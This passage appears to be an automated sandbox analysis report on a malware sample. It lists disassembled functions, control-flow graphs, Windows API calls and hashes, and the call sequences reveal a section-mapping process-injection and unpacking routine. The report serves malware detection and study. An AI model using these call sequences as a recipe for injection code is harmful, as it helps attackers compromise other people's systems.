                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                          • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                          • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                          • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24
                                          Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 276 4018a5-4018b7 270->276 274 401595-4015be 271->274 275 401896 271->275 274->275 284 4015c4-4015db NtDuplicateObject 274->284 275->276 281 4018c5 276->281 282 4018bc-4018e3 call 401193 276->282 281->282 284->275 287 4015e1-401605 NtCreateSection 284->287 289 401661-401687 NtCreateSection 287->289 290 401607-401628 NtMapViewOfSection 287->290 289->275 292 40168d-401691 289->292 290->289 293 40162a-401646 NtMapViewOfSection 290->293 292->275 294 401697-4016b8 NtMapViewOfSection 292->294 293->289 296 401648-40165e 293->296 294->275 297 4016be-4016da NtMapViewOfSection 294->297 296->289 297->275 300 4016e0 call 4016e5 297->300
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                          • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                          • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                          • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24
                                          Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: CreateProcessTerminateThreadUser
                                          • String ID:
                                          • API String ID: 1921587553-0
                                          • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                          • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5
                                          Function 005B01D0 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 319 5b01d0-5b01e9 320 5b01eb-5b01ed 319->320 321 5b01ef 320->321 322 5b01f4-5b0200 CreateToolhelp32Snapshot 320->322 321->322 323 5b0202-5b0208 322->323 324 5b0210-5b021d Module32First 322->324 323->324 329 5b020a-5b020e 323->329 325 5b021f-5b0220 call 5afe8f 324->325 326 5b0226-5b022e 324->326 330 5b0225 325->330 329->320 329->324 330->326
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005B01F8
                                          • Module32First.KERNEL32(00000000,00000224), ref: 005B0218
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_59e000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0
                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction ID: e7bbdf1561e7437a30e6eff91d414c57aaa9830f57a48993edeb72d12a2ac40f
                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction Fuzzy Hash: D6F062365007156FD7203BF9EC8DAAFBAE8BF49725F101528E642910C0DAB0F8458661
                                          Function 004E003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 4e003c-4e0047 1 4e004c-4e0263 call 4e0a3f call 4e0e0f call 4e0d90 VirtualAlloc 0->1 2 4e0049 0->2 17 4e028b-4e0292 1->17 18 4e0265-4e0289 call 4e0a69 1->18 2->1 20 4e02a1-4e02b0 17->20 21 4e02ce-4e03c2 VirtualProtect call 4e0cce call 4e0ce7 18->21 20->21 22 4e02b2-4e02cc 20->22 29 4e03d1-4e03e0 21->29 22->20 30 4e0439-4e04b8 VirtualFree 29->30 31 4e03e2-4e0437 call 4e0ce7 29->31 33 4e04be-4e04cd 30->33 34 4e05f4-4e05fe 30->34 31->29 38 4e04d3-4e04dd 33->38 35 4e077f-4e0789 34->35 36 4e0604-4e060d 34->36 39 4e078b-4e07a3 35->39 40 4e07a6-4e07b0 35->40 36->35 41 4e0613-4e0637 36->41 38->34 43 4e04e3-4e0505 38->43 39->40 44 4e086e-4e08be LoadLibraryA 40->44 45 4e07b6-4e07cb 40->45 46 4e063e-4e0648 41->46 51 4e0517-4e0520 43->51 52 4e0507-4e0515 43->52 50 4e08c7-4e08f9 44->50 48 4e07d2-4e07d5 45->48 46->35 49 4e064e-4e065a 46->49 53 4e07d7-4e07e0 48->53 54 4e0824-4e0833 48->54 49->35 55 4e0660-4e066a 49->55 56 4e08fb-4e0901 50->56 57 4e0902-4e091d 50->57 58 4e0526-4e0547 51->58 52->58 59 4e07e4-4e0822 53->59 60 4e07e2 53->60 62 4e0839-4e083c 54->62 61 4e067a-4e0689 55->61 56->57 63 4e054d-4e0550 58->63 59->48 60->54 64 4e068f-4e06b2 61->64 65 4e0750-4e077a 61->65 62->44 66 4e083e-4e0847 62->66 68 4e0556-4e056b 63->68 69 4e05e0-4e05ef 63->69 70 4e06ef-4e06fc 64->70 71 4e06b4-4e06ed 64->71 65->46 72 4e084b-4e086c 66->72 73 4e0849 66->73 74 4e056f-4e057a 68->74 75 4e056d 68->75 69->38 76 4e06fe-4e0748 70->76 77 4e074b 70->77 71->70 72->62 73->44 78 4e057c-4e0599 74->78 79 4e059b-4e05bb 74->79 75->69 76->77 77->61 84 4e05bd-4e05db 78->84 79->84 84->63
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004E024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4e0000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691
                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction ID: 0081b0556e17fab112a9901bdf31d18a609d4019900529a049e2bf45be3bf3fc
                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction Fuzzy Hash: 51529974A00269DFDB64CF59C984BA8BBB1BF09305F1480DAE41DAB351DB74AE85CF14
                                          Function 004E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 332 4e0e0f-4e0e24 SetErrorMode * 2 333 4e0e2b-4e0e2c 332->333 334 4e0e26 332->334 334->333
                                          APIs
                                          • SetErrorMode.KERNELBASE(00000400,?,?,004E0223,?,?), ref: 004E0E19
                                          • SetErrorMode.KERNELBASE(00000000,?,?,004E0223,?,?), ref: 004E0E1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4e0000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction ID: 48ed06c69d374c95c1802b7477aefdcf9cd8afad3e06eac9cc97ddeb4b77a536
                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction Fuzzy Hash: BBD0123114512877D7002A95DC09BCE7B1CDF05B63F008421FB0DD9180C7B4994046E9
                                          Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                          • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                          • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                          • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F
                                          Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 368 4018d7 365->368 369 4018ce-4018e3 call 401193 365->369 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 368->369 379->378
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                          • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                          • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                          • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F
                                          Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                          • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                          • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                          • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                          Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                          • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                          • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                          • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                          Function 005AFE8F Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 444 5afe8f-5afec9 call 5b01a2 447 5afecb-5afefe VirtualAlloc call 5aff1c 444->447 448 5aff17 444->448 450 5aff03-5aff15 447->450 448->448 450->448
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005AFEE0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_59e000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction ID: 134329b68aab8e0e48211d480fb418466929546c9f92f2238432f27d564cdf45
                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction Fuzzy Hash: 9A113F79A00208EFDB01DF98C985E99BFF5AF09350F0580A4F9489B362D371EA50DF80
                                          Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                          • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                          • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                          • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                          Non-executed Functions

                                          Function 004E092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4e0000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .$GetProcAddress.$l
                                          • API String ID: 0-2784972518
                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                          • Instruction ID: 2afff6d97f0d5d265b30955e71ec098413363c8082aaa5e6f1f0c23110c51dc9
                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                          • Instruction Fuzzy Hash: 01316EB6900649DFDB10CF9AC880AAEBBF5FF48325F14404AD451A7312D7B5EA85CFA4
                                          Function 00403277 Relevance: .1, Instructions: 140COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2be31adffe8ef9a69749db2abe7559b0cece5d524a2086fe9dfd492a8f138f6b
                                          • Instruction ID: 9a70a59ca06b8baac6379d39fd7701dedd3f8fe15a89ac6d8ad20cbbbbeea73d
                                          • Opcode Fuzzy Hash: 2be31adffe8ef9a69749db2abe7559b0cece5d524a2086fe9dfd492a8f138f6b
                                          • Instruction Fuzzy Hash: 9041256085D2C24FEB5B4E3448955E27F69E96336231801FFC482EB1D7D63D4B07925A
                                          Function 0040324F Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd713e8a9ffb35993257ca06bb1ca9cf03b0909bce816e3c168a85f7237ff4a9
                                          • Instruction ID: 47d85a717b2f9eb1e037dbaf55b436ab29ce309417f93d286f8d159decdfda18
                                          • Opcode Fuzzy Hash: bd713e8a9ffb35993257ca06bb1ca9cf03b0909bce816e3c168a85f7237ff4a9
                                          • Instruction Fuzzy Hash: 681101A1D1D2829BDF5B1E2108655767F6C6E7331772800FFD042BA2D2E23D5B02A26F
                                          Function 00403256 Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8235a342c0a5ccfb7a676b72f8706d5939bc8c2cb4e96ca567b58c971c6cfde2
                                          • Instruction ID: 44dbed29d4116881d315b966fbacf1cf40a73d3247e8d5490da27da81908206f
                                          • Opcode Fuzzy Hash: 8235a342c0a5ccfb7a676b72f8706d5939bc8c2cb4e96ca567b58c971c6cfde2
                                          • Instruction Fuzzy Hash: 091120A1D1C2825BDF9B1E204C645B27F6C6A7332371800FFE402BA2D6E23D1B03925E
                                          Function 00403247 Relevance: .1, Instructions: 66COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f11a235e0e08faed31d233c350fe522c88a0f226e8326adf6e177ce42ec05621
                                          • Instruction ID: 6cc5313a22b02943346cb09be328e63b116041f9455492dba296d6b6c8d47a80
                                          • Opcode Fuzzy Hash: f11a235e0e08faed31d233c350fe522c88a0f226e8326adf6e177ce42ec05621
                                          • Instruction Fuzzy Hash: 0111E0A1C1D2829BDF5A2E2108648767F6C6A7731772800FFD042FA2D6E23D5B03A15F
                                          Function 005AFAAD Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_59e000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                          • Instruction ID: 776f1fa7c33d843a055052c72e5a2c6a432081ef5e894b143d8ffc4d3188508f
                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                          • Instruction Fuzzy Hash: 28117C72340105AFDB44DE95DC91EAA77EAFB89360B298065E909CB312E675EC02C760
                                          Function 0040326C Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
                                          • Instruction ID: 83c2e45a663ff97a83121d71df7fde14c7d1be506299b7fe0adcc4aca9f65d16
                                          • Opcode Fuzzy Hash: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
                                          • Instruction Fuzzy Hash: 3211CBA1C1D2825BDFAA1E2108544B67F6CAA7771771400FFD402BA2D6E23D5B02929E
                                          Function 00403290 Relevance: .1, Instructions: 58COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
                                          • Instruction ID: 18a3bc8234d562e7f0c7d25340e1ec3d72d942eb246f5034c2dedc7c4f371e85
                                          • Opcode Fuzzy Hash: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
                                          • Instruction Fuzzy Hash: 3611E191D1C2820BDFA62E2048545B67F6C5A7335771840FFD401F62D6F13D1F02825A
                                          Function 004E0D90 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4e0000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                          • Instruction ID: 7f122e87e4b10b88a260dd6f6917151713e982c092820a5c47ea5c5c82e06777
                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                          • Instruction Fuzzy Hash: 3701DF72A006408FDB21CF65CD04FAB33A5EB86306F0544B6D91AD7281E3B8A8818B84

